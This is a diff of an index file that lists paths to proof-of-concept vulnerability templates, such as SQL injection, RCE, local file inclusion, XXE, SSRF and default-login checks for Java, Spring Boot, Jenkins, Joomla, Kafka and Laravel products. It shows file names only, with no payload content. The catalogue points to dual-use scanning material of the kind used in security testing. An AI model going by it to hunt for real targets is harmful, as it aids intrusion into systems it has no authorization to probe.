+./poc/injection/viewlinc-crlf-injection-11015.yaml ./poc/injection/viewlinc-crlf-injection.yaml ./poc/injection/weiphp-sql-injection-11190.yaml ./poc/injection/weiphp-sql-injection.yaml @@ -47097,7 +47069,6 @@ ./poc/injection/xmlinputfactory_xxeinjection.yaml ./poc/injection/xmlreader_xxeinjection.yaml ./poc/injection/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml -./poc/injection/yongyou-u8-RegisterServlet-sql-Injection.yaml ./poc/injection/yongyou-u8-nc-bs-sm-login2-RegisterServlet-sql-Injection.yaml ./poc/injection/yonyou-nc-registerservlet-jndi-injection.yaml ./poc/injection/yuantian-oa-getdata-action-sql-injection.yaml @@ -47149,7 +47120,6 @@ ./poc/java/apache-tomcat-cve-2022-34305.yaml ./poc/java/apache-tomcat-snoop-374.yaml ./poc/java/apache-tomcat-snoop-376.yaml -./poc/java/apache-tomcat-snoop-377.yaml ./poc/java/apache-tomcat-snoop-cookie-handling.yaml ./poc/java/apache-tomcat-snoop-ip-disclosure.yaml ./poc/java/apache-tomcat-snoop.yaml @@ -47187,19 +47157,18 @@ ./poc/java/default-jetty-page-6863.yaml ./poc/java/default-jetty-page-6864.yaml ./poc/java/default-jetty-page-6865.yaml -./poc/java/default-tomcat-page-6910.yaml +./poc/java/default-tomcat-page-6911.yaml ./poc/java/default-tomcat-page.yaml ./poc/java/detect-springboot-actuator.yaml ./poc/java/e-cology-springframework-directory-traversal.yaml ./poc/java/ecology-javabeanshell-rce.yaml -./poc/java/ecology-springframework-directory-traversal-7175.yaml +./poc/java/ecology-springframework-directory-traversal-7174.yaml ./poc/java/ecology-springframework-directory-traversal.yaml ./poc/java/ecology-springframework-directory-traversal.yml ./poc/java/ecology-springframework-directoryTraversal.yaml ./poc/java/exposed-alps-spring-1.yaml ./poc/java/exposed-alps-spring-2.yaml ./poc/java/exposed-alps-spring-3.yaml -./poc/java/exposed-alps-spring-7283.yaml ./poc/java/exposed-alps-spring-7284.yaml ./poc/java/exposed-alps-spring-7285.yaml ./poc/java/exposed-alps-spring.yaml @@ -47214,6 +47183,7 @@ ./poc/java/hangseng-jrescloud-uploadimage-fileupload.yaml ./poc/java/ibm-websphere-admin-panel.yaml ./poc/java/ibm-websphere-panel.yaml +./poc/java/ibm-websphere-ssrf-8126.yaml ./poc/java/ibm-websphere-ssrf.yaml ./poc/java/ibm-websphere.yaml ./poc/java/java-melody-exposed-1.yaml @@ -47225,9 +47195,7 @@ ./poc/java/java-melody-stat.yaml ./poc/java/java-melody-xss-8225.yaml ./poc/java/java-melody-xss-8226.yaml -./poc/java/java-melody-xss.yaml ./poc/java/java-rmi-detect-8228.yaml -./poc/java/java-rmi-detect.yaml ./poc/java/javamelody-detect.yaml ./poc/java/javascript-env-1.yaml ./poc/java/javascript-env-2.yaml @@ -47237,12 +47205,12 @@ ./poc/java/javascript-env-6.yaml ./poc/java/javascript-env-8229.yaml ./poc/java/javascript-env-8230.yaml -./poc/java/javascript-env-8231.yaml +./poc/java/javascript-env.yaml ./poc/java/javashop.yaml ./poc/java/jboss-as.yaml ./poc/java/jboss-cve-2010-1871.yml ./poc/java/jboss-default-password.yaml -./poc/java/jboss-detect.yaml +./poc/java/jboss-detect-8237.yaml ./poc/java/jboss-eap.yaml ./poc/java/jboss-jbpm-admin.yaml ./poc/java/jboss-juddi.yaml @@ -47260,6 +47228,7 @@ ./poc/java/jboss.yaml ./poc/java/jetty-cve-2021-28164.yml ./poc/java/jetty-information-disclosure.yaml +./poc/java/jetty-showcontexts-enable-8295.yaml ./poc/java/jetty-showcontexts-enable-8296.yaml ./poc/java/jetty-showcontexts-enable-8297.yaml ./poc/java/jetty-showcontexts-enable.yaml @@ -47298,7 +47267,6 @@ ./poc/java/public-tomcat-manager-9708.yaml ./poc/java/public-tomcat-manager-9709.yaml ./poc/java/public-tomcat-manager-9710.yaml -./poc/java/public-tomcat-manager-9711.yaml ./poc/java/public-tomcat-manager.yaml ./poc/java/rce-via-java-deserialization.yaml ./poc/java/sap-netweaver-as-java-detect.yaml @@ -47306,8 +47274,8 @@ ./poc/java/shiro-124-rememberme.yaml ./poc/java/shiro-deserialization-detection.yaml ./poc/java/shiro-detect-10195.yaml +./poc/java/shiro-detect-10196.yaml ./poc/java/shiro-detect-10197.yaml -./poc/java/shiro-detect.yaml ./poc/java/spring-boot-admin.yaml ./poc/java/spring-cloud-cve-2020-5405.yml ./poc/java/spring-cloud-cve-2020-5410.yml @@ -47316,18 +47284,19 @@ ./poc/java/spring-cve-2016-4977.yaml ./poc/java/spring-cve-2016-4977.yml ./poc/java/spring-eureka.yaml -./poc/java/spring-framework-exceptions.yaml +./poc/java/spring-framework-exceptions-10493.yaml ./poc/java/spring-framework.yaml ./poc/java/spring_cloud_gateway_CVE_2022_22947.yaml ./poc/java/spring_cloud_gateway_cve_2022_22947.yaml ./poc/java/spring_collection.yaml ./poc/java/springboot-actuator-1.yaml ./poc/java/springboot-actuator-10433.yaml +./poc/java/springboot-actuator-10434.yaml ./poc/java/springboot-actuator-10435.yaml ./poc/java/springboot-actuator-2.yaml ./poc/java/springboot-actuator-unauth.yaml ./poc/java/springboot-actuators-jolokia-xxe-1.yaml -./poc/java/springboot-actuators-jolokia-xxe-10428.yaml +./poc/java/springboot-actuators-jolokia-xxe-10429.yaml ./poc/java/springboot-actuators-jolokia-xxe-10430.yaml ./poc/java/springboot-actuators-jolokia-xxe-10431.yaml ./poc/java/springboot-actuators-jolokia-xxe-10432.yaml @@ -47338,31 +47307,28 @@ ./poc/java/springboot-autoconfig-10437.yaml ./poc/java/springboot-autoconfig-2.yaml ./poc/java/springboot-beans-1.yaml +./poc/java/springboot-beans-10438.yaml ./poc/java/springboot-beans-10439.yaml ./poc/java/springboot-beans-10440.yaml -./poc/java/springboot-beans-10441.yaml ./poc/java/springboot-beans-2.yaml ./poc/java/springboot-beans.yaml ./poc/java/springboot-conditions.yaml ./poc/java/springboot-configprops-1.yaml ./poc/java/springboot-configprops-10442.yaml -./poc/java/springboot-configprops-10443.yaml ./poc/java/springboot-configprops-10444.yaml +./poc/java/springboot-configprops-10445.yaml ./poc/java/springboot-configprops-2.yaml -./poc/java/springboot-configprops.yaml ./poc/java/springboot-detect.yaml ./poc/java/springboot-dump-1.yaml ./poc/java/springboot-dump-10447.yaml ./poc/java/springboot-dump-2.yaml -./poc/java/springboot-dump.yaml ./poc/java/springboot-env-1.yaml -./poc/java/springboot-env-10448.yaml ./poc/java/springboot-env-10449.yaml +./poc/java/springboot-env-10450.yaml ./poc/java/springboot-env-10451.yaml ./poc/java/springboot-env-2.yaml ./poc/java/springboot-env-unauth.yaml ./poc/java/springboot-env-unauth.yml -./poc/java/springboot-env.yaml ./poc/java/springboot-exposures.yaml ./poc/java/springboot-features.yaml ./poc/java/springboot-gateway-10452.yaml @@ -47371,31 +47337,26 @@ ./poc/java/springboot-h2-db-rce-10456.yaml ./poc/java/springboot-h2-db-rce-10457.yaml ./poc/java/springboot-h2-db-rce-10458.yaml -./poc/java/springboot-h2-db-rce.yaml ./poc/java/springboot-health-1.yaml ./poc/java/springboot-health-10459.yaml -./poc/java/springboot-health-10460.yaml ./poc/java/springboot-health-2.yaml ./poc/java/springboot-heapdump-1.yaml ./poc/java/springboot-heapdump-10461.yaml -./poc/java/springboot-heapdump-10462.yaml ./poc/java/springboot-heapdump-10463.yaml ./poc/java/springboot-heapdump-10464.yaml +./poc/java/springboot-heapdump-10465.yaml ./poc/java/springboot-heapdump-2.yaml ./poc/java/springboot-heapdump-v2.yaml ./poc/java/springboot-httptrace-1.yaml ./poc/java/springboot-httptrace-10466.yaml ./poc/java/springboot-httptrace-10467.yaml ./poc/java/springboot-httptrace-10468.yaml -./poc/java/springboot-httptrace-10469.yaml ./poc/java/springboot-httptrace-2.yaml ./poc/java/springboot-info-10470.yaml -./poc/java/springboot-info-10471.yaml ./poc/java/springboot-jolokia.yaml ./poc/java/springboot-log4j-rce-10472.yaml ./poc/java/springboot-log4j-rce-10473.yaml ./poc/java/springboot-log4j-rce-10474.yaml -./poc/java/springboot-log4j-rce.yaml ./poc/java/springboot-logfile.yaml ./poc/java/springboot-loggers-1.yaml ./poc/java/springboot-loggers-10475.yaml @@ -47406,6 +47367,7 @@ ./poc/java/springboot-mappings-10478.yaml ./poc/java/springboot-mappings-10479.yaml ./poc/java/springboot-mappings-10480.yaml +./poc/java/springboot-mappings-10481.yaml ./poc/java/springboot-mappings-2.yaml ./poc/java/springboot-metrics-1.yaml ./poc/java/springboot-metrics-10483.yaml @@ -47415,10 +47377,11 @@ ./poc/java/springboot-threaddump-10484.yaml ./poc/java/springboot-threaddump-10485.yaml ./poc/java/springboot-threaddump-10486.yaml +./poc/java/springboot-threaddump-10487.yaml ./poc/java/springboot-threaddump-2.yaml ./poc/java/springboot-trace-10488.yaml ./poc/java/springboot-trace-10489.yaml -./poc/java/springboot-trace-10490.yaml +./poc/java/springboot-trace-10491.yaml ./poc/java/springboot-trace-10492.yaml ./poc/java/springboot-whitelabel.yaml ./poc/java/springboot-workflow.yaml @@ -47431,10 +47394,10 @@ ./poc/java/springcloud-function-spel-rce.yaml ./poc/java/springer.yaml ./poc/java/struts-debug-mode-10559.yaml -./poc/java/struts-debug-mode-10561.yaml +./poc/java/struts-debug-mode-10560.yaml ./poc/java/struts-debug-mode.yaml ./poc/java/struts-problem-report-10562.yaml -./poc/java/struts-problem-report-10563.yaml +./poc/java/struts-problem-report-10564.yaml ./poc/java/struts-problem-report.yaml ./poc/java/struts2_001.yaml ./poc/java/sun-glassfish.yaml @@ -47448,10 +47411,9 @@ ./poc/java/tomcat-default-login-10789.yaml ./poc/java/tomcat-default-login-10790.yaml ./poc/java/tomcat-default-login-10791.yaml -./poc/java/tomcat-default-login.yaml ./poc/java/tomcat-default-manager.yaml ./poc/java/tomcat-detect-10792.yaml -./poc/java/tomcat-detect-10793.yaml +./poc/java/tomcat-detect-10794.yaml ./poc/java/tomcat-detect-10795.yaml ./poc/java/tomcat-detect.yaml ./poc/java/tomcat-examples-login_CVE-2022-34305.yaml @@ -47482,8 +47444,8 @@ ./poc/java/tomcat-manager-pathnormalization.yaml ./poc/java/tomcat-monitor-uses-wadl.yaml ./poc/java/tomcat-pathnormalization-1.yaml -./poc/java/tomcat-pathnormalization-10798.yaml ./poc/java/tomcat-pathnormalization-10799.yaml +./poc/java/tomcat-pathnormalization-10800.yaml ./poc/java/tomcat-pathnormalization-2.yaml ./poc/java/tomcat-scripts-1.yaml ./poc/java/tomcat-scripts-10801.yaml @@ -47516,7 +47478,6 @@ ./poc/java/weblogic-cve-2019-2729-2.yml ./poc/java/weblogic-cve-2020-14750.yml ./poc/java/weblogic-detect-11142.yaml -./poc/java/weblogic-detect-11143.yaml ./poc/java/weblogic-detect-11144.yaml ./poc/java/weblogic-detect-11145.yaml ./poc/java/weblogic-detect-11146.yaml @@ -47531,11 +47492,10 @@ ./poc/java/weblogic-ssrf.yaml ./poc/java/weblogic-ssrf.yml ./poc/java/weblogic-t3-detect-11151.yaml -./poc/java/weblogic-t3-detect-11152.yaml +./poc/java/weblogic-t3-detect-11153.yaml ./poc/java/weblogic-t3-detect.yaml ./poc/java/weblogic-t3-search.yaml ./poc/java/weblogic-uddiexplorer.yaml -./poc/java/weblogic-weak-login-11154.yaml ./poc/java/weblogic-weak-login-11155.yaml ./poc/java/weblogic-weak-login-11156.yaml ./poc/java/weblogic-workflow-11157.yaml @@ -47543,7 +47503,7 @@ ./poc/java/websphere-portal-preauth-ssrf.yaml ./poc/java/websphere-version-detect.yaml ./poc/java/webview-addjavascript-interface-11175.yaml -./poc/java/webview-addjavascript-interface-11177.yaml +./poc/java/webview-addjavascript-interface-11176.yaml ./poc/java/webview-addjavascript-interface.yaml ./poc/java/webview-javascript-11178.yaml ./poc/java/webview-javascript.yaml @@ -47602,7 +47562,8 @@ ./poc/javascript/auth-json.yaml ./poc/javascript/azuredeploy-json.yaml ./poc/javascript/bower-json-768.yaml -./poc/javascript/bower-json-770.yaml +./poc/javascript/bower-json-769.yaml +./poc/javascript/bower-json.yaml ./poc/javascript/composer-auth-json.yaml ./poc/javascript/config-js.yaml ./poc/javascript/credentials-json.yaml @@ -47650,14 +47611,15 @@ ./poc/javascript/fastjson-1-2-24-rce-7400.yaml ./poc/javascript/fastjson-1-2-41-rce-7401.yaml ./poc/javascript/fastjson-1-2-41-rce-7403.yaml +./poc/javascript/fastjson-1-2-41-rce-7404.yaml ./poc/javascript/fastjson-1-2-42-rce-7405.yaml +./poc/javascript/fastjson-1-2-42-rce-7407.yaml ./poc/javascript/fastjson-1-2-42-rce-7408.yaml ./poc/javascript/fastjson-1-2-43-rce-7409.yaml ./poc/javascript/fastjson-1-2-43-rce-7411.yaml ./poc/javascript/fastjson-1-2-43-rce-7412.yaml ./poc/javascript/fastjson-1-2-47-rce-7413.yaml ./poc/javascript/fastjson-1-2-47-rce-7415.yaml -./poc/javascript/fastjson-1-2-47-rce-7416.yaml ./poc/javascript/fastjson-1-2-47-rce.yaml ./poc/javascript/fastjson-1-2-62-rce-7417.yaml ./poc/javascript/fastjson-1-2-62-rce-7419.yaml @@ -47665,7 +47627,6 @@ ./poc/javascript/fastjson-1-2-62-rce.yaml ./poc/javascript/fastjson-1-2-67-rce-7421.yaml ./poc/javascript/fastjson-1-2-67-rce-7423.yaml -./poc/javascript/fastjson-1-2-67-rce-7424.yaml ./poc/javascript/fastjson-1-2-67-rce.yaml ./poc/javascript/fastjson-1-2-68-rce-1.yaml ./poc/javascript/fastjson-1-2-68-rce-2.yaml @@ -47694,6 +47655,7 @@ ./poc/javascript/fastjson-version-7426.yaml ./poc/javascript/fastjson-version-7427.yaml ./poc/javascript/fastjson-version-7428.yaml +./poc/javascript/fastjson-version.yaml ./poc/javascript/fastjson1_2_47-rce-Deserialization.yaml ./poc/javascript/firebase-messaging-sw-js-exposure.yaml ./poc/javascript/fuzzing-xss-get-params-javascript-context-injection.yaml @@ -47722,7 +47684,7 @@ ./poc/javascript/javascript-env-6.yaml ./poc/javascript/javascript-env-8229.yaml ./poc/javascript/javascript-env-8230.yaml -./poc/javascript/javascript-env-8231.yaml +./poc/javascript/javascript-env.yaml ./poc/javascript/js-analyse.yaml ./poc/javascript/js-css-script-optimizer-137f403484d4acf21480db9b55924e66.yaml ./poc/javascript/js-css-script-optimizer.yaml @@ -47819,7 +47781,6 @@ ./poc/javascript/keycloak-json-8473.yaml ./poc/javascript/keycloak-json-8474.yaml ./poc/javascript/keys-js.yaml -./poc/javascript/kiwitcms-json-rpc.yaml ./poc/javascript/knight-lab-timelinejs-0f42e86470e92d725c0f62d2c358c29e.yaml ./poc/javascript/knight-lab-timelinejs-4381e1c7831311e9b345b4fa5c2bb585.yaml ./poc/javascript/knight-lab-timelinejs-fc9575cffd43eab455fe76720d510ad0.yaml @@ -47830,6 +47791,7 @@ ./poc/javascript/landray-oa-custom-jsp-rce.yaml ./poc/javascript/liferay-jsonws.yaml ./poc/javascript/log4jshell-detect.yaml +./poc/javascript/log4jshell.yaml ./poc/javascript/magicflu-mailupdate-jsp-fileupload.yaml ./poc/javascript/mojarra-jsf.yaml ./poc/javascript/nextjs-cve-2017-16877.yml @@ -47844,9 +47806,9 @@ ./poc/javascript/ojs-unauthenticated-open-redirect.yaml ./poc/javascript/package-json-1.yaml ./poc/javascript/package-json-2.yaml +./poc/javascript/package-json-9421.yaml ./poc/javascript/package-json-9422.yaml ./poc/javascript/package-json-9423.yaml -./poc/javascript/package-json.yaml ./poc/javascript/pdfjs-viewer-shortcode-901f07b1c8adb20b4d89c03c0e4b0f6e.yaml ./poc/javascript/pdfjs-viewer-shortcode-a8f0b32d7cfb6af435cac07ab61c5de1.yaml ./poc/javascript/pdfjs-viewer-shortcode.yaml @@ -47880,7 +47842,7 @@ ./poc/javascript/wanhu-ezoffice-smartupload-jsp-fileupload.yaml ./poc/javascript/wanhu-ezoffice-upload-jsp-fileupload.yaml ./poc/javascript/webview-addjavascript-interface-11175.yaml -./poc/javascript/webview-addjavascript-interface-11177.yaml +./poc/javascript/webview-addjavascript-interface-11176.yaml ./poc/javascript/webview-addjavascript-interface.yaml ./poc/javascript/webview-javascript-11178.yaml ./poc/javascript/webview-javascript.yaml @@ -47912,7 +47874,6 @@ ./poc/jenkins/jenkins-api-panel-8261.yaml ./poc/jenkins/jenkins-api-panel-8262.yaml ./poc/jenkins/jenkins-api-panel.yaml -./poc/jenkins/jenkins-asyncpeople-8264.yaml ./poc/jenkins/jenkins-asyncpeople-8265.yaml ./poc/jenkins/jenkins-asyncpeople-8266.yaml ./poc/jenkins/jenkins-asyncpeople-8267.yaml @@ -47924,30 +47885,29 @@ ./poc/jenkins/jenkins-cve-2018-1000861-rce.yml ./poc/jenkins/jenkins-default-8270.yaml ./poc/jenkins/jenkins-default-8271.yaml -./poc/jenkins/jenkins-default-8272.yaml ./poc/jenkins/jenkins-default-8273.yaml ./poc/jenkins/jenkins-default-login.yaml ./poc/jenkins/jenkins-default-pwd.yaml ./poc/jenkins/jenkins-detect-8274.yaml -./poc/jenkins/jenkins-detect-8275.yaml +./poc/jenkins/jenkins-detect-8276.yaml ./poc/jenkins/jenkins-detect.yaml ./poc/jenkins/jenkins-exposed.yaml ./poc/jenkins/jenkins-headers-detect.yaml ./poc/jenkins/jenkins-home-dir-exposure.yaml -./poc/jenkins/jenkins-login-8277.yaml ./poc/jenkins/jenkins-login-8278.yaml ./poc/jenkins/jenkins-login-8279.yaml +./poc/jenkins/jenkins-login-8280.yaml ./poc/jenkins/jenkins-login-detection.yaml ./poc/jenkins/jenkins-login.yaml ./poc/jenkins/jenkins-rce.yaml ./poc/jenkins/jenkins-script-8281.yaml ./poc/jenkins/jenkins-script-8282.yaml -./poc/jenkins/jenkins-script-8283.yaml ./poc/jenkins/jenkins-script-8284.yaml -./poc/jenkins/jenkins-script.yaml +./poc/jenkins/jenkins-stack-trace-8285.yaml ./poc/jenkins/jenkins-stack-trace-8286.yaml ./poc/jenkins/jenkins-stack-trace-8287.yaml ./poc/jenkins/jenkins-stack-trace-8288.yaml +./poc/jenkins/jenkins-stack-trace-8289.yaml ./poc/jenkins/jenkins-token.yaml ./poc/jenkins/jenkins-unauthorized-access.yaml ./poc/jenkins/jenkins-unauthorized-access.yml @@ -47989,6 +47949,7 @@ ./poc/joomla/fg-joomla-to-wordpress.yaml ./poc/joomla/freejoomlas.yaml ./poc/joomla/joomla-cnvd-2019-34135-rce.yml +./poc/joomla/joomla-com-fabrik-lfi-8370.yaml ./poc/joomla/joomla-com-fabrik-lfi-8371.yaml ./poc/joomla/joomla-com-fabrik-lfi-8372.yaml ./poc/joomla/joomla-com-fabrik-lfi-8373.yaml @@ -47997,7 +47958,6 @@ ./poc/joomla/joomla-config-dist-file.yaml ./poc/joomla/joomla-config-file-8374.yaml ./poc/joomla/joomla-config-file-8375.yaml -./poc/joomla/joomla-config-file-8376.yaml ./poc/joomla/joomla-config-file-8377.yaml ./poc/joomla/joomla-cve-2015-7297-sqli.yml ./poc/joomla/joomla-cve-2017-8917-sqli.yml @@ -48021,7 +47981,6 @@ ./poc/joomla/joomla-manifest-file.yaml ./poc/joomla/joomla-panel-8389.yaml ./poc/joomla/joomla-panel-8390.yaml -./poc/joomla/joomla-panel-8391.yaml ./poc/joomla/joomla-panel-8392.yaml ./poc/joomla/joomla-panel.yaml ./poc/joomla/joomla-sensitive-config.yaml @@ -48046,9 +48005,8 @@ ./poc/kafka/kafka-center-default-login-8415.yaml ./poc/kafka/kafka-center-default-login-8416.yaml ./poc/kafka/kafka-center-default-login-8417.yaml -./poc/kafka/kafka-center-default-login.yaml ./poc/kafka/kafka-center-default-password.yaml -./poc/kafka/kafka-center-login-8419.yaml +./poc/kafka/kafka-center-login-8418.yaml ./poc/kafka/kafka-center-login.yaml ./poc/kafka/kafka-center.yaml ./poc/kafka/kafka-connect-ui-8421.yaml @@ -48063,13 +48021,13 @@ ./poc/kafka/kafka-manager-unauth.yml ./poc/kafka/kafka-manager.yaml ./poc/kafka/kafka-misconfig.yaml +./poc/kafka/kafka-monitoring-8428.yaml ./poc/kafka/kafka-monitoring-8429.yaml -./poc/kafka/kafka-monitoring-8430.yaml ./poc/kafka/kafka-monitoring-8431.yaml ./poc/kafka/kafka-monitoring.yaml ./poc/kafka/kafka-topics-ui-8432.yaml ./poc/kafka/kafka-topics-ui-8433.yaml -./poc/kafka/kafka-topics-ui-8435.yaml +./poc/kafka/kafka-topics-ui-8434.yaml ./poc/kafka/kafka-topics-ui.yaml ./poc/kafka/kafka-ui.yaml ./poc/kafka/kafkaoffsetmonitor.yaml @@ -48099,7 +48057,6 @@ ./poc/laravel/laravel-debug-enabled-8575.yaml ./poc/laravel/laravel-debug-enabled-8576.yaml ./poc/laravel/laravel-debug-enabled-8577.yaml -./poc/laravel/laravel-debug-enabled-8578.yaml ./poc/laravel/laravel-debug-error-8579.yaml ./poc/laravel/laravel-debug-error.yaml ./poc/laravel/laravel-debug-info-leak.yaml @@ -48112,11 +48069,12 @@ ./poc/laravel/laravel-env-8582.yaml ./poc/laravel/laravel-env-8583.yaml ./poc/laravel/laravel-env-8584.yaml +./poc/laravel/laravel-env-8585.yaml ./poc/laravel/laravel-env-8586.yaml ./poc/laravel/laravel-env-disclosure.yaml ./poc/laravel/laravel-env.yaml +./poc/laravel/laravel-filemanager-8590.yaml ./poc/laravel/laravel-filemanager-8591.yaml -./poc/laravel/laravel-filemanager-lfi-8587.yaml ./poc/laravel/laravel-filemanager-lfi-8588.yaml ./poc/laravel/laravel-filemanager-lfi-8589.yaml ./poc/laravel/laravel-filemanager.yaml @@ -48174,7 +48132,6 @@ ./poc/ldap/teampass-ldap.yaml ./poc/ldap/unauth-ldap-account-manager.yaml ./poc/local_file_inclusion/0xlfi.yaml -./poc/local_file_inclusion/0xlfi3.yaml ./poc/local_file_inclusion/0xlfifuzz.yaml ./poc/local_file_inclusion/0xlfifuzz1.yaml ./poc/local_file_inclusion/Bitrix_LFI.yaml @@ -48195,22 +48152,21 @@ ./poc/local_file_inclusion/accent-microcomputers-lfi-14.yaml ./poc/local_file_inclusion/accent-microcomputers-lfi-15.yaml ./poc/local_file_inclusion/accent-microcomputers-lfi-16.yaml -./poc/local_file_inclusion/accent-microcomputers-lfi-17.yaml -./poc/local_file_inclusion/ad-widget-lfi-124.yaml +./poc/local_file_inclusion/accent-microcomputers-lfi.yaml ./poc/local_file_inclusion/ad-widget-lfi-125.yaml -./poc/local_file_inclusion/ad-widget-lfi.yaml +./poc/local_file_inclusion/ad-widget-lfi-126.yaml ./poc/local_file_inclusion/admin-word-count-column-lfi-81.yaml ./poc/local_file_inclusion/admin-word-count-column-lfi.yaml ./poc/local_file_inclusion/advanced-access-manager-lfi-116.yaml ./poc/local_file_inclusion/advanced-access-manager-lfi-117.yaml -./poc/local_file_inclusion/advanced-access-manager-lfi-118.yaml ./poc/local_file_inclusion/advanced-access-manager-plugin-lfi.yaml ./poc/local_file_inclusion/alertlist-lfi.yaml ./poc/local_file_inclusion/alibaba-anyproxy-lfi.yaml -./poc/local_file_inclusion/amministrazione-aperta-lfi.yaml +./poc/local_file_inclusion/amministrazione-aperta-lfi-303.yaml ./poc/local_file_inclusion/apachesolrlfissrf.yaml ./poc/local_file_inclusion/asanhamayesh-cms-lfi.yaml -./poc/local_file_inclusion/asanhamayesh-lfi-553.yaml +./poc/local_file_inclusion/asanhamayesh-lfi-552.yaml +./poc/local_file_inclusion/asanhamayesh-lfi.yaml ./poc/local_file_inclusion/bems-api-lfi-707.yaml ./poc/local_file_inclusion/bems-api-lfi-708.yaml ./poc/local_file_inclusion/bems-api-lfi-710.yaml @@ -48218,16 +48174,16 @@ ./poc/local_file_inclusion/blue-ocean-excellence-lfi-756.yaml ./poc/local_file_inclusion/blue-ocean-excellence-lfi-757.yaml ./poc/local_file_inclusion/blue-ocean-excellence-lfi-758.yaml -./poc/local_file_inclusion/brandfolder-lfi-776.yaml ./poc/local_file_inclusion/brandfolder-lfi-777.yaml ./poc/local_file_inclusion/brandfolder-lfi-778.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-804.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-805.yaml +./poc/local_file_inclusion/bullwark-momentum-lfi-806.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-807.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-808.yaml -./poc/local_file_inclusion/cab-fare-calculator-lfi-819.yaml +./poc/local_file_inclusion/cab-fare-calculator-lfi-818.yaml ./poc/local_file_inclusion/cab-fare-calculator-lfi.yaml -./poc/local_file_inclusion/candidate-application-lfi-850.yaml +./poc/local_file_inclusion/candidate-application-lfi-851.yaml ./poc/local_file_inclusion/candidate-application-lfi.yaml ./poc/local_file_inclusion/cherry-lfi-902.yaml ./poc/local_file_inclusion/cherry-lfi.yaml @@ -48243,16 +48199,18 @@ ./poc/local_file_inclusion/crawlab-lfi.yaml ./poc/local_file_inclusion/crystal-live-http-server-lfi.yaml ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1281.yaml +./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1282.yaml ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1283.yaml ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1284.yaml -./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1285.yaml ./poc/local_file_inclusion/dahua-icc-readPic-lfi.yaml ./poc/local_file_inclusion/db-backup-lfi-6774.yaml +./poc/local_file_inclusion/db-backup-lfi-6775.yaml ./poc/local_file_inclusion/db-backup-lfi-6776.yaml ./poc/local_file_inclusion/db-backup-lfi.yaml ./poc/local_file_inclusion/diarise-theme-lfi-6990.yaml ./poc/local_file_inclusion/diarise-theme-lfi-6991.yaml ./poc/local_file_inclusion/diarise-theme-lfi-6992.yaml +./poc/local_file_inclusion/dicoogle-pacs-lfi-6993.yaml ./poc/local_file_inclusion/dicoogle-pacs-lfi-6994.yaml ./poc/local_file_inclusion/dicoogle-pacs-lfi-6995.yaml ./poc/local_file_inclusion/drupal-7-elfinder.yaml @@ -48268,11 +48226,11 @@ ./poc/local_file_inclusion/elfinder-detect-2.yaml ./poc/local_file_inclusion/elfinder-detect-7201.yaml ./poc/local_file_inclusion/elfinder-detect-7202.yaml +./poc/local_file_inclusion/elfinder-path-traversal-7203.yaml ./poc/local_file_inclusion/elfinder-path-traversal.yaml ./poc/local_file_inclusion/elfinder-rce.yaml ./poc/local_file_inclusion/elfinder-version-7204.yaml ./poc/local_file_inclusion/elfinder-version-7205.yaml -./poc/local_file_inclusion/elfinder-version.yaml ./poc/local_file_inclusion/ewebs-lfi.yaml ./poc/local_file_inclusion/fhem-6-unauthenticated-lfi.yaml ./poc/local_file_inclusion/flink-jobmanager-cve-2020-17519-lfi.yml @@ -48283,6 +48241,7 @@ ./poc/local_file_inclusion/generic-linux-lfi-7589.yaml ./poc/local_file_inclusion/generic-linux-lfi.yaml ./poc/local_file_inclusion/generic-windows-lfi-7590.yaml +./poc/local_file_inclusion/generic-windows-lfi-7591.yaml ./poc/local_file_inclusion/generic-windows-lfi-7592.yaml ./poc/local_file_inclusion/generic-windows-lfi.yaml ./poc/local_file_inclusion/geovision-geowebserver-lfi-1.yaml @@ -48290,6 +48249,7 @@ ./poc/local_file_inclusion/geovision-geowebserver-lfi-7595.yaml ./poc/local_file_inclusion/geovision-geowebserver-lfi-7596.yaml ./poc/local_file_inclusion/geovision-geowebserver-lfi-7597.yaml +./poc/local_file_inclusion/geovision-geowebserver-lfi.yaml ./poc/local_file_inclusion/glassfish-cve-2017-1000028-lfi.yml ./poc/local_file_inclusion/global-domains-lfi-7714.yaml ./poc/local_file_inclusion/global-domains-lfi-7715.yaml @@ -48297,11 +48257,8 @@ ./poc/local_file_inclusion/goip-1-lfi-7761.yaml ./poc/local_file_inclusion/goip-1-lfi-7762.yaml ./poc/local_file_inclusion/goip-1-lfi-7763.yaml -./poc/local_file_inclusion/goip-1-lfi-7764.yaml -./poc/local_file_inclusion/groupoffice-lfi-7849.yaml ./poc/local_file_inclusion/groupoffice-lfi-7850.yaml ./poc/local_file_inclusion/groupoffice-lfi-7851.yaml -./poc/local_file_inclusion/groupoffice-lfi.yaml ./poc/local_file_inclusion/gsoap-lfi-7853.yaml ./poc/local_file_inclusion/gsoap-lfi-7854.yaml ./poc/local_file_inclusion/gsoap-lfi-7855.yaml @@ -48312,7 +48269,6 @@ ./poc/local_file_inclusion/hb-audio-lfi-7913.yaml ./poc/local_file_inclusion/health-check-lfi-7921.yaml ./poc/local_file_inclusion/health-check-lfi-7922.yaml -./poc/local_file_inclusion/health-check-lfi.yaml ./poc/local_file_inclusion/hide-security-enhancer-lfi-7951.yaml ./poc/local_file_inclusion/hide-security-enhancer-lfi-7952.yaml ./poc/local_file_inclusion/hide-security-enhancer-lfi-7953.yaml @@ -48327,7 +48283,7 @@ ./poc/local_file_inclusion/huawei-hg659-lfi-8068.yaml ./poc/local_file_inclusion/huawei-hg659-lfi-8069.yaml ./poc/local_file_inclusion/huawei-hg659-lfi-8070.yaml -./poc/local_file_inclusion/huawei-hg659-lfi-8071.yaml +./poc/local_file_inclusion/huawei-hg659-lfi.yaml ./poc/local_file_inclusion/ibm-infoprint-lfi-8101.yaml ./poc/local_file_inclusion/ibm-infoprint-lfi-8102.yaml ./poc/local_file_inclusion/ibm-infoprint-lfi-8103.yaml @@ -48337,7 +48293,6 @@ ./poc/local_file_inclusion/issuu-panel-lfi-8198.yaml ./poc/local_file_inclusion/issuu-panel-lfi-8199.yaml ./poc/local_file_inclusion/issuu-panel-lfi-8200.yaml -./poc/local_file_inclusion/issuu-panel-lfi.yaml 